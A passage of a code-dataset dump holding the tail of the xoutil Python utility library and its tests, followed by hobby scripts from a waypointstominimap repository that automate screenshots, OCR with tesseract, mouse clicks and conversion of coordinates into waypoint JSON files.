_static_getmro(cls)\n return {t: t.__dict__[name] for t in mro if name in t.__dict__}\n\n\n@deprecated(\"``iter(maybe)`` in an exception management block.\")\ndef is_iterable(maybe):\n \"\"\"Returns True if `maybe` is an iterable object.\n\n e.g. implements the `__iter__` method::\n\n >>> is_iterable('all strings are iterable')\n True\n\n # Numbers are not\n >>> is_iterable(1)\n False\n\n >>> is_iterable(range(1))\n True\n\n >>> is_iterable({})\n True\n\n >>> is_iterable(tuple())\n True\n\n >>> is_iterable(set())\n True\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n try:\n iter(maybe)\n except TypeError:\n return False\n else:\n return True\n\n\n_is_collection_replacement = \"\"\"::\n from xotl.tools.values.simple import collection, nil\n collection(avoid=Mapping)(maybe) is not nil\n\"\"\"\n\n\n@deprecated(_is_collection_replacement)\ndef is_collection(maybe):\n \"\"\"Test `maybe` to see if it is a tuple, a list, a set or a generator\n function.\n\n It returns False for dictionaries and strings::\n\n >>> is_collection('all strings are iterable')\n False\n\n # Numbers are not\n >>> is_collection(1)\n False\n\n >>> is_collection(range(1))\n True\n\n >>> is_collection({})\n False\n\n >>> is_collection(tuple())\n True\n\n >>> is_collection(set())\n True\n\n >>> is_collection(a for a in range(100))\n True\n\n .. versionchanged:: 1.5.5 UserList are collections.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.values.simple import logic_collection_coerce, nil\n\n return logic_collection_coerce(maybe) is not nil\n\n\n@deprecated(\"``isinstance(maybe, Mapping)``\")\ndef is_mapping(maybe):\n \"\"\"Test `maybe` to see if it is a valid mapping.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return isinstance(maybe, Mapping)\n\n\n@deprecated('``maybe + \"\"`` in an exception management block.')\ndef is_string_like(maybe):\n \"\"\"Returns True if `maybe` acts like a string.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n try:\n maybe + \"\"\n except TypeError:\n return False\n else:\n return True\n\n\n@deprecated(\"None\", '\"is_scalar\" will be removed.')\ndef is_scalar(maybe):\n \"\"\"Returns if `maybe` is not not an iterable or a string.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from collections import Iterable\n\n return isinstance(maybe, str) or not isinstance(maybe, Iterable)\n\n\ndef is_staticmethod(cls, name):\n \"\"\"Returns true if a `method` is a static method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n When a static-method is declared, you can not test that condition using\n the traditional way::\n\n >>> class Foo:\n ... @staticmethod\n ... def bar():\n ... pass\n\n >>> isinstance(Foo.bar, staticmethod)\n False\n\n Using this function::\n\n >>> is_staticmethod(Foo, 'bar')\n True\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, staticmethod)\n\n\ndef is_classmethod(cls, name):\n \"\"\"Returns if a `method` is a class method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n When a class-method is declared, you can not test that condition using the\n traditional way::\n\n >>> class Foo:\n ... @classmethod\n ... def bar(cls):\n ... pass\n\n >>> isinstance(Foo.bar, classmethod)\n False\n\n Using this function::\n\n >>> is_classmethod(Foo, 'bar')\n True\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, classmethod)\n\n\ndef is_instancemethod(cls, name):\n \"\"\"Returns if a `method` is neither a static nor a class method.\n\n :param cls: The class or object that holds the method.\n\n :param name: The name of the method.\n\n To find out if a method is \"normal\", ``isinstance(obj.method,\n MethodType)`` can't be used::\n\n >>> class Foobar:\n ... @classmethod\n ... def cm(cls):\n ... pass\n ... def im(self):\n ... pass\n\n >>> isinstance(Foobar.cm, MethodType)\n True\n\n Using this function::\n\n >>> is_instancemethod(Foobar, 'im')\n True\n\n >>> is_instancemethod(Foobar, 'cm')\n False\n\n \"\"\"\n desc = _get_mro_attr(cls, name)\n return isinstance(desc, FunctionType) # noqa\n\n\n@deprecated(\"``isinstance(maybe, ModuleType)``\")\ndef is_module(maybe):\n \"\"\"Returns True if `maybe` is a module.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return isinstance(maybe, ModuleType) # noqa\n\n\n@deprecated(\"``all(isinstance(obj, types) for obj in subjects)``\")\ndef are_instances(*args):\n \"\"\"Return True if every `subject` is an instance of (any) `types`.\n\n :param subjects: All but last positional arguments. Are the objects\n required to be instances of `types`.\n\n :param types: The last positional argument. Either a single type or a\n sequence of types. This must meet the conditions on the last\n argument of `isinstance`:func:.\n\n :returns: True or False. True if for every `subject`,\n ``isinstance(subject, types)`` is True. Otherwise, False.\n\n If no `subjects` are provided return True::\n\n >>> are_instances(int)\n True\n\n .. seealso:: The function `no_instances`:func: allows to test for\n subjects not being instances of types.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(args, 1, caller=\"are_instances\")\n *subjects, types = args\n if not subjects:\n isinstance(None, types) # HACK: always validate `types`.\n return all(isinstance(subject, types) for subject in subjects)\n\n\n@deprecated(\"``all(not isinstance(obj, types) for obj in subjects)``\")\ndef no_instances(*args):\n \"\"\"Return True if every `subject` is **not** an instance of (neither)\n `types`.\n\n :param subjects: All but last positional arguments. Are the objects\n required not to be instances of `types`.\n\n :param types: The last positional argument. Either a single type or a\n sequence of types. This must meet the conditions on the last\n argument of `isinstance`:func:.\n\n :returns: True or False. True if for every `subject`,\n ``isinstance(subject, types)`` is False. Otherwise, False.\n\n If no `subjects` are provided return True::\n\n >>> no_instances(int)\n True\n\n .. note:: This is not the same as ``not are_instances(...)``.\n\n This function requires that *no* subject is an instance of `types`.\n Negating `are_instances`:func: would be True if *any* subject is\n not an instance of `types`.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(args, 1, caller=\"no_instances\")\n *subjects, types = args\n if not subjects:\n isinstance(None, types) # HACK: always validate `types`.\n return all(not isinstance(subject, types) for subject in subjects)\n" }, { "alpha_fraction": 0.5795195698738098, "alphanum_fraction": 0.5964601635932922, "avg_line_length": 32.80341720581055, "blob_id": "81710bec881a5262f053d00b22ede0406c657ef0", "content_id": "66021aac8af07f5446a54b18087f4e32854577cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3956, "license_type": "no_license", "max_line_length": 78, "num_lines": 117, "path": "/tests/test_params.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport sys\nfrom xoutil.values import file_coerce, positive_int_coerce as positive_int\n\n# old params\nfrom xoutil.params import ParamSchemeRow as row, ParamScheme as scheme\n\n\nsample_scheme = scheme(\n row(\"stream\", 0, -1, \"output\", default=sys.stdout, coerce=file_coerce),\n row(\"indent\", 0, 1, default=1, coerce=positive_int),\n row(\"width\", 0, 1, 2, \"max_width\", default=79, coerce=positive_int),\n row(\"newline\", default=\"\\n\", coerce=(str,)),\n)\n\ndel file_coerce, positive_int\n\n\ndef test_basic_params():\n def get_values(*args, **kwargs):\n return sample_scheme(args, kwargs, strict=False)\n\n def foobar(**kwargs):\n res = sample_scheme.defaults\n res.update(kwargs)\n return res\n\n one, two = get_values(4, 80), foobar(indent=4, width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(2), foobar(indent=2)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(80, indent=4, extra=\"I'm OK!\")\n two = foobar(width=80, indent=4, extra=\"I'm OK!\")\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(width=80), foobar(width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(sys.stderr, 4, 80)\n two = foobar(indent=4, width=80, stream=sys.stderr)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(4, sys.stderr, newline=\"\\n\\r\")\n two = foobar(indent=4, stream=sys.stderr, newline=\"\\n\\r\")\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one = get_values(4, output=sys.stderr)\n two = foobar(indent=4, stream=sys.stderr)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n one, two = get_values(4, max_width=80), foobar(indent=4, width=80)\n assert one == two, \"\\n{} != \\n{}\".format(one, two)\n\n\ndef test_param_errors():\n def get_values(*args, **kwargs):\n return sample_scheme(args, kwargs)\n\n def error_repr(error):\n return \"{}()\".format(type(error).__name__, error)\n\n msg = 'Must raised \"{}\", \\n\\tnot {}'\n\n try:\n get_values(sys.stderr, 4, output=sys.stderr)\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n try:\n get_values(4, -79)\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n try:\n get_values(80, indent=4, extra=\"I'm not OK!\")\n assert False, \"Should raise TypeError\"\n except TypeError:\n pass\n except BaseException as error:\n assert False, msg.format(TypeError.__name__, error_repr(error))\n\n\ndef test_pop_keyword_values():\n from xoutil.symbols import Unset\n from xoutil.params import pop_keyword_values as popkw, Undefined\n\n kwds = dict(default=None, values=[1, 2, 3], collector=sum)\n names = ((\"func\", \"collector\"), \"default\")\n\n assert popkw(dict(kwds), \"values\", *names) == [[1, 2, 3], sum, None]\n\n try:\n assert popkw(dict(kwds), *names) == \"whatever\"\n except TypeError:\n assert True\n\n try:\n assert popkw(dict(kwds), *names, ignore_error=True) == [sum, None]\n except TypeError:\n assert False\n\n test = [Undefined, [1, 2, 3], sum, None]\n assert popkw(dict(kwds), \"x\", \"values\", *names) == test\n\n test = [None, [1, 2, 3], sum, None]\n assert popkw(dict(kwds), \"x\", \"values\", *names, default=None) == test\n\n test = [Unset, [1, 2, 3], sum, None]\n defaults = dict(x=Unset)\n assert popkw(dict(kwds), \"x\", \"values\", *names, defaults=defaults) == test\n" }, { "alpha_fraction": 0.48051947355270386, "alphanum_fraction": 0.48051947355270386, "avg_line_length": 29.799999237060547, "blob_id": "867ce51be6f21fe7b06d5720f4b58ff71a133245", "content_id": "3cc5eb1347ea626e16b28e79114f8fbc000c322b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 154, "license_type": "permissive", "max_line_length": 51, "num_lines": 5, "path": "/docs/source/xotl.tools/progress.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.progress`:mod: - Console progress utils\n===================================================\n\n.. automodule:: xotl.tools.progress\n :members:\n" }, { "alpha_fraction": 0.7655172348022461, "alphanum_fraction": 0.7655172348022461, "avg_line_length": 47.33333206176758, "blob_id": "83b24f495350ebe4df8a1a08284011b2580b73ac", "content_id": "d1687172b809a957bc156ffa35fe473acd140f28", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 145, "license_type": "permissive", "max_line_length": 73, "num_lines": 3, "path": "/docs/source/history/_changes-1.7.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the argument `key` to `xoutil.iterators.delete_duplicates`:func:.\n\n- Added the function `xoutil.iterators.iter_delete_duplicates`:func:.\n" } ]
244
l1ving/waypointstominimap
https://github.com/l1ving/waypointstominimap
03d9dc17f8fbd56bed58e8c361c244ed49e634df
80c8065225064166002d3e53fa69b4091233a689
16f44d9b985526234d2e4b0f50b644ad2fb4d87e
refs/heads/master
2022-03-14T06:24:50.317000
2019-10-16T12:32:02
2019-10-16T12:32:02
206,346,026
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7276995182037354, "alphanum_fraction": 0.7323943376541138, "avg_line_length": 22.77777862548828, "blob_id": "00b775352fafd8e76685e836ab1989637ccc4574", "content_id": "1ecd8c548de0dfac5191b49c36754fd8817a68e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 213, "license_type": "no_license", "max_line_length": 95, "num_lines": 9, "path": "/waypoints/v2/remove-newline.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\nimport fileinput\n\nfor line in fileinput.input(r'/home/usr/Downloads/waypoints/small_file_1.txt', inplace = True):\n\tif not re.search(r'\\n',line):\n\t\tprint(line, end = \"\")" }, { "alpha_fraction": 0.7072165012359619, "alphanum_fraction": 0.7175257802009583, "avg_line_length": 22.095237731933594, "blob_id": "3803c6887fde716aa637b6cca9d8b3d1b39721b7", "content_id": "8d97838b9d1eedea365b629c48e26aea36aeb20d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 65, "num_lines": 21, "path": "/tesseract-python/get-screenshot-v3.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot\ndef take_screenshot(widget):\n\tw = Gdk.get_default_root_window()\n\tleft, top = widget.get_position()\n\twidth, height = widget.get_size()\n\tpixbuf = Gdk.pixbuf_get_from_window(w, left, top, width, height)\n\treturn pixbuf\n\tprint(\"Screenshot taken: \" + path)\n" }, { "alpha_fraction": 0.7700650691986084, "alphanum_fraction": 0.7700650691986084, "avg_line_length": 37.41666793823242, "blob_id": "da9600e3c90a21a85f8757a843cd57d789159413", "content_id": "108cf5f46c01b3259a5e9d95915a123aa5e990ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 461, "license_type": "no_license", "max_line_length": 150, "num_lines": 12, "path": "/README.md", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "# waypointstominimap\nGets waypoints and converts it to a readable format for minimap mods\n\n## This project is archived as it cannot be maintained\n\n## Usage\n\nThe jar is a program for getting the waypoints.\n\nPlease do *not* even try using this. It's a hacky mess that I made to work. There is some code written by me and some of it is a library (tesseract). \n\nYou can still look at my code and assess the quality and knowledge. Almost every aspect is documented.\n" }, { "alpha_fraction": 0.6390887498855591, "alphanum_fraction": 0.6672661900520325, "avg_line_length": 24.272727966308594, "blob_id": "98cfcf2593604dadbed3a7193446a590510132a5", "content_id": "b37c3b1ab7153214a6ea74f68a4b71ae42391776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1668, "license_type": "no_license", "max_line_length": 140, "num_lines": 66, "path": "/tesseract-python2/run-all.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\nimport sys\nimport keyboard\nimport subprocess\nimport pyautogui\n\t\n# loop this many times\nfor x in range(0, 20):\n\n\t# select window called Go to\n\tbashCommand = \"wmctrl -a \\\"Go to\\\"\"\n\tos.system(bashCommand)\n\t\n\t# wait\n\ttime.sleep(0.08)\n\t\n\t# screenshot active window\n\tscreen = Gdk.get_default_root_window().get_screen()\n\tw = screen.get_active_window()\n\tpb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\n\tpb.savev(\"active.png\", \"png\", (), ())\n\t\n\t# run tesseract from bash\n\tbashCommand = \"tesseract active.png stdout >> output1.txt\"\n\tos.system(bashCommand)\n\t\n\t# wait\n\ttime.sleep(1.3)\n\t\n\t# grab window title\n\tcommand = \"xprop -root _NET_ACTIVE_WINDOW\"\n\tfrontmost = subprocess.check_output([\"/bin/bash\", \"-c\", command]).decode(\"utf-8\").strip().split()[-1]\n\t## print(frontmost)\n\t\n\t# correct ID\n\tfixed_id = frontmost[:2]+\"0\"+frontmost[2:]\n\t## print(fixed_id)\n\t\n\t# grab window title\n\tcommand = \"wmctrl -lp\"\n\twindow_pid = [l.split()[2] for l in subprocess.check_output([\"/bin/bash\", \"-c\", command]).decode(\"utf-8\").splitlines() if fixed_id in l][0]\n\t## print(window_pid)\n\t\n\t# debugging to test if it works\n\t## if ( window_pid == \"2375\" ):\n\t\t## print(\"Code will work\")\n\t## else:\n\t\t## print(\"your code is shitty and doesn't work\")\n\t\n\t# actually run function\n\t## if ( window_pid == \"2375\" ):\n\t\t# select window called Go to\n\tbashCommand = \"python3 press-buttons.py >> output4.txt\"\n\tos.system(bashCommand)\n\t\n\t## else:\n\t\t## print(\"you're retarded and this doesn't work\")\n\t\n\t# loop this many times\n\tfor x in range(0, 9):\n\t\t# click at x1902 y1022\n\t\tpyautogui.click(x=1902, y=1022)\n" }, { "alpha_fraction": 0.5717703104019165, "alphanum_fraction": 0.5837320685386658, "avg_line_length": 33.83333206176758, "blob_id": "69aac3c766c892c099b81d05f46d6f320a83376d", "content_id": "a6db6a2eca9e195d8faf31b46d47335a3edf4014", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/waypoints/v2/111-split.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "lines_per_file = 1\nsmallfile = None\nwith open('111.txt') as bigfile:\n for lineno, line in enumerate(bigfile):\n if lineno % lines_per_file == 0:\n if smallfile:\n smallfile.close()\n small_filename = 'zzz_split_{}.txt'.format(lineno + lines_per_file)\n smallfile = open(small_filename, \"w\")\n smallfile.write(line)\n if smallfile:\n smallfile.close()\n" }, { "alpha_fraction": 0.6854838728904724, "alphanum_fraction": 0.6854838728904724, "avg_line_length": 16.85714340209961, "blob_id": "dbfcdcfd75ccfa5cf2963730a0f15cd60a81906e", "content_id": "b4d6ac021a680cb5c227141d4f2a748c28791126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/waypoints/v2/list-all-files.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport os, sys\n\npath = '.'\nfiles = os.listdir(path)\nfor name in files:\n print(name)" }, { "alpha_fraction": 0.7090619802474976, "alphanum_fraction": 0.7217805981636047, "avg_line_length": 19.96666717529297, "blob_id": "559ee7f050263dab1bcd2063484597c46abb8525", "content_id": "f008cd7793d0b650412776564d0ddb2453b1ca38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 629, "license_type": "no_license", "max_line_length": 57, "num_lines": 30, "path": "/tesseract-python/bin/run-all.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\nimport sys\nimport keyboard\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot active window\nscreen = Gdk.get_default_root_window().get_screen()\nw = screen.get_active_window()\npb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\npb.savev(\"active.png\", \"png\", (), ())\n\n# run tesseract from bash\nbashCommand = \"tesseract active.png stdout > output1.txt\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(1.3)\n\n# press down arrow key\nkeyboard.press('down')\n" }, { "alpha_fraction": 0.6523809432983398, "alphanum_fraction": 0.6809523701667786, "avg_line_length": 31.384614944458008, "blob_id": "ecc352ac75ed885d3c51d23d56f8c55354915855", "content_id": "479f8482dc5373371ea89f976f7fbba976ab7407", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/python-map/get-screenshot.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#include <gdk-pixbuf/gdk-pixbuf.h>\nfrom gi.repository import Gdk, GdkPixbuf\n\nw = Gdk.get_default_root_window()\nsz = w.get_geometry()[2:4]\n#print \"The size of the window is %d x %d\" % sz\npb = Gdk.pixbuf_get_from_window(w, 1783, 1064, sz[1], sz[1])\nif (pb != None):\n\tpb.savev(\"images/screenshot.png\",\"png\", [], [])\n\tprint \"Screenshot saved to screenshot.png.\"\nelse:\n\tprint \"Unable to get the screenshot.\"" }, { "alpha_fraction": 0.7473683953285217, "alphanum_fraction": 0.7520467638969421, "avg_line_length": 32.040000915527344, "blob_id": "5edd094181fc8b730c29e44b4847409d36beb5b5", "content_id": "504c5be3c13d9a596e34967b4f8ec09a0a603aab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 104, "num_lines": 25, "path": "/tesseract-python/lib/python3.6/site-packages/pymsgbox/native.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "# These functions use the operating system's native message box calls.\r\n\r\nimport sys\r\n\r\n# default back to the original functions if no native functions exist.\r\nimport pymsgbox\r\nalert = pymsgbox.alert\r\nconfirm = pymsgbox.confirm\r\nprompt = pymsgbox.prompt\r\npassword = pymsgbox.password\r\n\r\n\r\n# The platformModule is where we reference the platform-specific functions.\r\nif sys.platform.startswith('java'):\r\n import pymsgbox._native_java as platformModule\r\nelif sys.platform == 'darwin':\r\n import pymsgbox._native_osx as platformModule\r\nelif sys.platform == 'win32':\r\n import pymsgbox._native_win as platformModule\r\n alert = platformModule.alert\r\n confirm = platformModule.confirm\r\nelse:\r\n import pymsgbox._native_x11 as platformModule\r\n\r\nplatformModule # this line used to silence the linting tool. Will be removed once implementation is done\r\n\r\n\r\n" }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7769230604171753, "avg_line_length": 20.66666603088379, "blob_id": "6b20df8fd91fba7c2d4fd11fc0ddf30e9cd4ed9b", "content_id": "35d698ce53ce1c766d64b7c3df4a0c0d5c037721", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/tesseract-python2/run-ocr.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\n# run tesseract from bash\nbashCommand = \"tesseract active.png stdout >> output1.txt\"\nos.system(bashCommand)\n" }, { "alpha_fraction": 0.603554368019104, "alphanum_fraction": 0.6199589967727661, "avg_line_length": 30.80434799194336, "blob_id": "fc0fc984a5eefa5c7760b78991bcbffbeeb0e784", "content_id": "501e18c6860eaa89e59ae0fa89dd39dc135a9a28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "no_license", "max_line_length": 352, "num_lines": 46, "path": "/waypoints/v2/rename.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\n\nif sys.version_info[0] != 3 or sys.version_info[1] < 0:\n\tprint(\"This script requires Python version 3.0\")\n\tsys.exit(1)\n\nfor x in range(0, 1000):\t\n\t# list out files\n\tfileList = ['zzz_split_19.txt', 'zzz_split_3.txt', 'zzz_split_78.txt']\n\t\n\t# define the current file as a random choice\n\tcurrentfile = random.choice(fileList)\n\tprint(currentfile)\n\n\t# define this\n\t#convertedname = \"'\" + currentfile + \"', \"\n\t#print(convertedname)\n\n\t# open current file and read first line\n\twith open(currentfile) as f:\n\t\tfirst_line = f.readline()\n\t\tfirst_line = first_line.rstrip()\n\n\t# define fullnamejson as END + first_line + .json\n\tfullnamejson = \"END_\" + first_line + \".json\"\n\n\t# define fullname as END + first_line\n\tfullname = \"END_\" + first_line\n\n\tos.rename(currentfile, fullnamejson)\n\tprint(fullnamejson)\n\n\t# define x y and z\n\tx, y, z =first_line.split(',')\n\n\t# define formatted as what will be written to the file\n\tformatted = \"{\\n \\\"id\\\": \\\"\" + fullname + \"\\\",\\n \\\"name\\\": \\\"END\\\",\\n \\\"icon\\\": \\\"waypoint-normal.png\\\",\\n \\\"x\\\": \" + x + \",\\n \\\"y\\\": \" + y + \",\\n \\\"z\\\": \" + z + \",\\n \\\"r\\\": 61,\\n \\\"g\\\": 1,\\n \\\"b\\\": 164,\\n \\\"enable\\\": true,\\n \\\"type\\\": \\\"Normal\\\",\\n \\\"origin\\\": \\\"journeymap\\\",\\n \\\"dimensions\\\": [\\n 0\\n ],\\n \\\"persistent\\\": true\\n}\"\n\tprint(formatted)\n\n\t# write to file\n\twith open(fullnamejson, \"w\") as text_file:\n\t\t##print(f(fullnamejson), file=text_file)\n\t\tprint(f'{formatted}', file=text_file)\n" }, { "alpha_fraction": 0.6926714181900024, "alphanum_fraction": 0.7044917345046997, "avg_line_length": 22.5, "blob_id": "0571f1dc23fe34aafffdb6acc10538d4cd9ea207", "content_id": "24e0c149fd4a32259dc34551ec53949d908709d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/tesseract-python2/get-screenshot-v2.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\nimport os\nimport time\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# wait\ntime.sleep(0.08)\n\n# screenshot active window\nscreen = Gdk.get_default_root_window().get_screen()\nw = screen.get_active_window()\npb = Gdk.pixbuf_get_from_window(w, *w.get_geometry())\npb.savev(\"active.png\", \"png\", (), ())\n" }, { "alpha_fraction": 0.6171616911888123, "alphanum_fraction": 0.6633663177490234, "avg_line_length": 32.66666793823242, "blob_id": "0dcb3110c43537bf64d1a24f713529dc5b879d36", "content_id": "a6fbe8579b5c60cd1786fdd31e266df16392b545", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 303, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/tesseract-python/get-screenshot.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk, GdkPixbuf\n\nw = Gdk.get_default_root_window()\nsz = w.get_geometry()[2:4]\n#print \"The size of the window is %d x %d\" % sz\npb = Gdk.pixbuf_get_from_window(w, 1783, 1064, sz[1], sz[1])\npb.savev(\"images/screenshot.png\",\"png\", [], [])\n" }, { "alpha_fraction": 0.621004581451416, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 20.799999237060547, "blob_id": "03eb6cc151b43ec203645fc24654713b3767f113", "content_id": "757697c14a5100c466b6066000770238a3ea6cbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 35, "num_lines": 10, "path": "/tesseract-python2/press-buttons.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import pyautogui, sys, os\n\n# select window called Go to\nbashCommand = \"wmctrl -a \\\"Go to\\\"\"\nos.system(bashCommand)\n\n# loop this many times\nfor x in range(0, 9):\n\t# click at x1902 y1022\n\tpyautogui.click(x=1902, y=1022)\n\n" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.692307710647583, "avg_line_length": 12.25, "blob_id": "ac37941522558d5fc117d046112b2d3aecf4f42f", "content_id": "27c8b0673bca388841c9f5679aca81ae511d098c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/rename-waypoints/create-numbers.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "input = 0\noutput = range(input + 189)\n\nprint(output)" }, { "alpha_fraction": 0.7627118825912476, "alphanum_fraction": 0.7627118825912476, "avg_line_length": 14, "blob_id": "d9c6ad12119112cd1886f20fda340d90cb21aa75", "content_id": "cf822fb89d64f9ec86aef4b231cd67ffaa14a013", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/tesseract-python2/check-version.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\n\nbashCommand = \"python -V\"\nos.system(bashCommand)" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6361702084541321, "avg_line_length": 28.978723526000977, "blob_id": "0229c9bbae89445940f27b1d9b8878e09dde30b5", "content_id": "5009b25216ae45623bc1b5256701dd124f355881", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 351, "num_lines": 47, "path": "/waypoints/v2/write.py", "repo_name": "l1ving/waypointstominimap", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport random\nimport re\n\nif sys.version_info[0] != 3 or sys.version_info[1] < 0:\n\tprint(\"This requires Python version 3.0 or higher\")\n\tsys.exit(1)\n\n# list out files\nfileList = ['zzz_split_1.txt']\n\n# define the current file as a random choice\ncurrentfile = random.choice(fileList)\nprint(currentfile)\n\n# define this\n#convertedname = \"'\" + currentfile + \"', \"\n#print(convertedname)\n\n# open current file and read first line\nwith open(currentfile) as f:\n\tfirst_line = f.readline()\n\tfirst_line = first_line.rstrip()\nprint(currentfile)\nprint(first_line)\n\n# define fullnamejson as END + first_line + .json\nfullnamejson = \"END_\" + first_line + \".json\"\n\n# define fullname as END + first_line\nfullname = \"END_\" + first_line\n\nos.rename(currentfile, 